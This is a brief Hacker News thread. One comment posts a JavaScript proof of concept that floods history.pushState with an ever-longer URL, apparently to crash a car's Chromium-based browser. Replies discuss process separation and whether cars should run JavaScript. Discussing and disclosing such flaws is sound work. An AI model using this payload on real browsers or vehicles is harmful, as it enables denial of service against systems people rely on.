Hacker News new | ask | show | jobs
by nickodell 2283 days ago
Here's the vulnerability:

    <html>
    <script>
        var total = "";
        for (var i = 0; i < 100000; i++) {
            total = total + i.toString();
            history.pushState(0, 0, total);
        }
    </script>
    </html>
3 comments

Pretty funny. There's a joke in there about running javascript in your car.
Terminology nit: the vulnerability is the improper process separation. That JS snippet is a PoC demonstrating the vulnerability.
Why do they allow JavaScript at all?
The car has a chromium based web browser. The web uses javascript.
but it isn't a must. Just block it from executing it on a car